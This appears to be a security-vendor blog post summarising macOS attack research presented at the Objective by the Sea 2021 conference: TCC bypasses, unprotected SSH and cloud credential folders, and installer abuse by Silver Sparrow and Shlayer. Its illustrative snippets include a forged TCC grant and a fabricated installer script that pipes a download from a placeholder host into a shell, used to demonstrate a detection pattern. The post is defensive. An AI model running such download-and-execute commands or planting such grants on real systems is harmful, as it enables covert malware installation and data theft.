The start of fall 2021 saw the fourth Objective by the Sea (OBTS) security conference, which is the only security conference to focus exclusively on Apple’s ecosystem. As such, it draws many of the top minds in the field. This year, those minds, having been starved of a good security conference for so long, were primed and ready to share all kinds of good information.

Conferences like this are important for understanding how attackers and their methods are evolving. Like all operating systems, macOS presents a moving target to attackers as it acquires new features and new forms of protection over time.

OBTS was a great opportunity to see how attacks against macOS are evolving. Here’s what I learned.

Transparency, Consent, and Control bypasses

Transparency, Consent, and Control (TCC) is a system that requires user consent before an app can access certain data, via prompts asking you to confirm that access. For example, if an app wants to access something like your contacts or files in your Documents folder on a modern version of macOS, you will be asked to allow it before the app can see that data.

A TCC prompt asking the user to allow access to the Downloads folder

In recent years, Apple has been ratcheting down the power of the root user. Once upon a time, root was like God—it was the one and only user that could do everything on the system. It could create or destroy, and could see all. This hasn’t been the case for years, with things like System Integrity Protection (SIP) and the read-only signed system volume preventing even the root user from changing files across a wide swath of the hard drive.

TCC has been making inroads in further reducing the power of root over users’ data. If an app has root access, it still cannot even see—much less modify—a lot of the data in your user folder without your explicit consent.

This can cause some problems. For example, antivirus software such as Malwarebytes needs broad visibility into the file system in order to best protect you. But even though some Malwarebytes processes run with root permissions, they still can’t see some files. Thus, apps like this often have to ask the user for a special permission called Full Disk Access (FDA). Without FDA, Malwarebytes and other security apps can’t fully protect you, and only you can grant that access.

This is generally a good thing, as it puts you in control of access to your data. Malware often wants access to your sensitive data, either to steal it or to encrypt it and demand a ransom. TCC means that malware can’t automatically gain access to your data if it gets onto your system, and may be a part of the reason why we just don’t see ransomware on macOS.

TCC is a bit of a pain for us, and a common point of difficulty for users of our software, but it does mean that we can’t get access to some of your most sensitive files without your knowledge. This assumes, of course, that you understood the FDA prompts and what you were agreeing to, which is debatable. Apple’s current process for granting FDA doesn’t make the consequences clear, leaving it up to the app requesting FDA to explain them. This makes it fairly easy to trick a user into giving access to something they shouldn’t.

However, social engineering isn’t the only danger. Many researchers presenting at this year’s conference discussed bugs that allowed them to get around the TCC system in macOS entirely, without getting user consent.

Andy Grant (@andywgrant) presented a vulnerability in which a remote attacker with root permissions can grant a malicious process whatever TCC permissions are desired. The process involves creating a new user on the system, then using that user to grant the permissions.

Csaba Fitzl (@theevilbit) gave a talk on a “Mount(ain) of Bugs,” in which he discussed another vulnerability involving mount points for disk image files. Normally, when you connect an external drive or double-click a disk image file, the volume is “mounted” (in other words, made available for access) within the /Volumes directory. For example, if you connect a drive named “backup”, it becomes accessible on the system at /Volumes/backup. This is the disk’s “mount point.”

Mountain of bugs
Title slide of Csaba Fitzl’s “Mount(ain) of Bugs” talk

Csaba was able to create a disk image file containing a custom TCC.db file. This file is a database that controls the TCC permissions that the user has granted to apps. Normally, the TCC.db file is readable, but cannot be modified by anything other than the system. However, by mounting this disk image while also setting the mount point to the path of the folder containing the TCC.db file, he was able to trick the system into accepting his arbitrary TCC.db file as if it were the real one, allowing him to change TCC permissions however he desired.
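To see why control over TCC.db is so powerful, here is a sketch of what such a database contains. The schema below is deliberately simplified (the real access table has many more columns and changes between macOS versions), but it shows how a single row can record a Full Disk Access grant for an arbitrary app:

```python
import sqlite3

# Simplified sketch of the TCC database's "access" table; the real schema
# has more columns and varies across macOS versions.
db = sqlite3.connect(":memory:")
db.execute("""
    CREATE TABLE access (
        service    TEXT,     -- protected resource, e.g. kTCCServiceSystemPolicyAllFiles
        client     TEXT,     -- bundle ID or path of the app being granted access
        auth_value INTEGER   -- 0 = denied, 2 = allowed (simplified)
    )
""")

# An attacker who controls this file can simply insert a grant
# ("com.attacker.payload" is a made-up bundle ID for illustration):
db.execute(
    "INSERT INTO access VALUES (?, ?, ?)",
    ("kTCCServiceSystemPolicyAllFiles", "com.attacker.payload", 2),
)

row = db.execute(
    "SELECT auth_value FROM access WHERE client = 'com.attacker.payload'"
).fetchone()
print(row[0])  # 2 -> treated as "allowed"
```

Because the system trusts whatever this database says, swapping in an attacker-controlled copy is equivalent to clicking “Allow” on every prompt.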

There were other TCC bypasses mentioned as well, but perhaps the most disturbing is the fact that there’s a fairly significant amount of highly sensitive data that is not protected by TCC at all. Any malware can collect that data without difficulty.

What is this data, you ask? One example is the .ssh folder in the user’s home folder. SSH is a program used for securely gaining command line access to a remote Mac, Linux, or other Unix system, and the .ssh folder is where the keys used to authenticate those connections are stored. This makes the data in that folder a high-value target for an attacker looking to move laterally within an organization.

There are other similar folders in the same location that can contain credentials for other services, such as AWS or Azure, which are similarly wide open. Also unprotected are the folders where data is stored for any browser other than Safari, which can include credentials if you use a browser’s built-in password manager.

Now, admittedly, there could be some technical challenges to protecting some or all of this data under the umbrella of TCC. However, the average IT admin is probably more concerned about SSH keys or other credentials being harvested than about an attacker being able to peek inside your Downloads folder.

Attackers are doing interesting things with installers

Installers are, of course, important for getting malware onto a system. Often, users must be tricked into opening something in order to infect their machine, and several of the techniques attackers use for this were discussed at the conference.

One common method is to use Apple installer packages (.pkg files), but this is not particularly stealthy. Knowledgeable and cautious folks may examine the installer package, as well as its preinstall and postinstall scripts (which, as their names suggest, run before and after installation), to make sure nothing untoward is going on.
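As a sketch of that kind of review: on macOS, `pkgutil --expand some.pkg outdir` unpacks a package so its scripts can be read. The snippet below fabricates such an expanded layout (the script content and the detection pattern are illustrative, not an exhaustive check) and scans the scripts for a download-and-execute pattern:

```python
import pathlib
import re
import tempfile

# Fabricate the layout that pkgutil --expand would produce, for demonstration.
outdir = pathlib.Path(tempfile.mkdtemp()) / "expanded"
scripts = outdir / "Scripts"
scripts.mkdir(parents=True)
(scripts / "preinstall").write_text(
    "#!/bin/sh\ncurl -fsSL https://example.invalid/payload | sh\n"
)

# Flag any script that downloads content and pipes it straight to a shell.
suspicious = re.compile(r"(curl|wget).*\|\s*(sh|bash)")
flagged = [s.name for s in scripts.iterdir() if suspicious.search(s.read_text())]
print(flagged)  # ['preinstall']
```

A reviewer doing this by hand would simply open the Scripts directory and read each file; the point is that the scripts are right there to be read, which is exactly why attackers have started hiding elsewhere.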

However, citing an example from the recent Silver Sparrow malware, Tony Lambert (@ForensicITGuy) discussed a sneaky method for getting malware installed: the oft-overlooked Distribution file.

The Distribution file is found inside Apple installer packages, and conveys information and options to the installer. However, JavaScript code can also be embedded in this file and run at the beginning of the installation, ostensibly to determine whether the system meets the requirements for the software being installed.

In the case of Silver Sparrow, however, the installer used this script to download and install the malware covertly. If you clicked Continue in the dialog shown below, you’d be infected even if you then opted not to continue with the installation.

An Apple installer asking the user to allow a program to run to determine if the software can be installed.
Click Continue to install malware
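To make the mechanism concrete, here is a trimmed-down Distribution file of the kind found inside .pkg installers, parsed with Python for illustration. The structure (an installation-check hook calling a JavaScript function defined in a script element) follows the normal Distribution format; the function body here is a placeholder showing where malicious calls such as system.run have been abused:

```python
import xml.etree.ElementTree as ET

# A minimal, illustrative Distribution file. The installation-check hook is
# meant for requirement checks, but the JavaScript it calls runs as soon as
# the user clicks Continue, before any "Install" confirmation.
DISTRIBUTION = """\
<installer-gui-script minSpecVersion="1">
    <title>Example</title>
    <installation-check script="checkSystem()"/>
    <script>
    function checkSystem() {
        // A malicious package can abuse this hook, e.g. via system.run(...),
        // instead of merely checking requirements.
        return true;
    }
    </script>
</installer-gui-script>
"""

root = ET.fromstring(DISTRIBUTION)
check = root.find("installation-check")
print(check.get("script"))  # the JS entry point invoked pre-install
print("system.run" in root.find("script").text)
```

Because this code runs during the requirement-check phase, clicking Continue is enough; backing out of the installation afterward changes nothing.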

Another interesting trick Tony discussed was the use of payload-free installers. These are installers that contain no files to install at all, and are really just a wrapper for a script that does the entire installation (likely via the preinstall script, but potentially also via Distribution).

A normal installer leaves behind a “receipt”: a file recording when the installation happened and what was installed where. However, installers that lack an official payload, and that download everything via scripts, leave no such receipt. This means that an IT admin or security researcher would be missing key information that could reveal when and where malware had been installed.
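As a sketch of what that lost evidence looks like: macOS stores receipts under /var/db/receipts as .plist and .bom files. The snippet below fabricates a minimal receipt plist to show the kind of forensic data a payload-free installer never produces (the key names follow typical receipts, but exact contents vary by package and macOS version):

```python
import io
import plistlib
from datetime import datetime

# Minimal stand-in for a receipt plist like those in /var/db/receipts.
# Key names follow typical receipts; real contents vary by package.
receipt = {
    "PackageIdentifier": "com.example.app",
    "PackageVersion": "1.0",
    "InstallDate": datetime(2021, 9, 1, 12, 0, 0),
    "InstallPrefixPath": "Applications",
}

buf = io.BytesIO()
plistlib.dump(receipt, buf)
buf.seek(0)

loaded = plistlib.load(buf)
print(loaded["PackageIdentifier"], loaded["InstallDate"].year)
```

An investigator can normally correlate these timestamps and identifiers with other logs; with a payload-free installer, this entire trail is simply absent.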

Chris Ross (@xorrior) discussed some of these same techniques, but also delved into installer plugins. These plugins are used within installer packages to create custom “panes” in the installer. (Most installers go through a specific series of steps prescribed by Apple, but some developers add additional steps via custom code.)

These installer plugins are written in Objective-C rather than scripting languages, and can therefore be more powerful. Better still, from an attacker’s perspective, these plugins are used so infrequently that many security researchers are likely to overlook them. Yet Chris was able to demonstrate techniques such a plugin could use to drop a malicious payload on the system.
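The plugin mechanism hinges on a Plugins directory inside the package: the compiled plugin bundle sits alongside an InstallerSections.plist that splices the custom pane into the normal sequence of steps. Here is a sketch of that plist, built with Python for illustration; the standard pane names follow Apple’s usual install sequence, and “MyCustomPane.bundle” is a hypothetical plugin name:

```python
import io
import plistlib

# Sketch of Plugins/InstallerSections.plist inside a .pkg. The standard pane
# names below follow Apple's usual install sequence; "MyCustomPane.bundle" is
# a hypothetical bundle whose Objective-C code runs when its pane is shown.
sections = {
    "SectionOrder": [
        "Introduction",
        "ReadMe",
        "License",
        "Target",
        "PackageSelection",
        "MyCustomPane.bundle",
        "Install",
    ]
}

buf = io.BytesIO()
plistlib.dump(sections, buf)
buf.seek(0)
order = plistlib.load(buf)["SectionOrder"]
print(order[5])  # MyCustomPane.bundle
```

Anyone auditing a package can expand it and check whether a Plugins directory with a plist like this exists; a custom entry in the pane order is a signal that native code will run during installation.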

Yet another issue was presented in Cedric Owens’ (@cedowens) talk. Although not related to an installer package (.pkg file), a vulnerability in macOS (CVE-2021-30657) could allow a Mac app to entirely bypass Gatekeeper, which is the core of many of Apple’s security features.

On macOS, any time you open an app downloaded from the Internet, you should at a minimum see a warning telling you that you’re opening an app (in case it was something masquerading as a Word document, or something similar). If there’s anything wrong with the app, Gatekeeper can go one step further and prevent you from opening it at all.

By constructing an app that was missing certain components usually considered essential (such as the Info.plist file), an attacker could create an app that was fully functional, yet triggered no warnings when launched. (Some variants of the Shlayer adware have been seen using this technique.)
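Gatekeeper’s involvement begins with the com.apple.quarantine extended attribute that browsers attach to downloads; its presence is what triggers the checks and warnings described above. The value is a small semicolon-separated record. The sketch below parses a made-up example; the field layout shown matches commonly observed values, but the format is undocumented and can vary:

```python
from datetime import datetime, timezone

# A fabricated com.apple.quarantine value. Commonly observed (undocumented)
# layout: flags;download time (hex epoch seconds);downloading agent;event UUID
raw = "0081;615f1e00;Safari;8B1E9C0D-0000-0000-0000-000000000000"

flags, ts_hex, agent, event_id = raw.split(";")
downloaded = datetime.fromtimestamp(int(ts_hex, 16), tz=timezone.utc)
print(agent, downloaded.year)  # Safari 2021
```

When a bug like CVE-2021-30657 lets an app sidestep the checks this attribute is supposed to trigger, the quarantine flag is still there; the system just never acts on it.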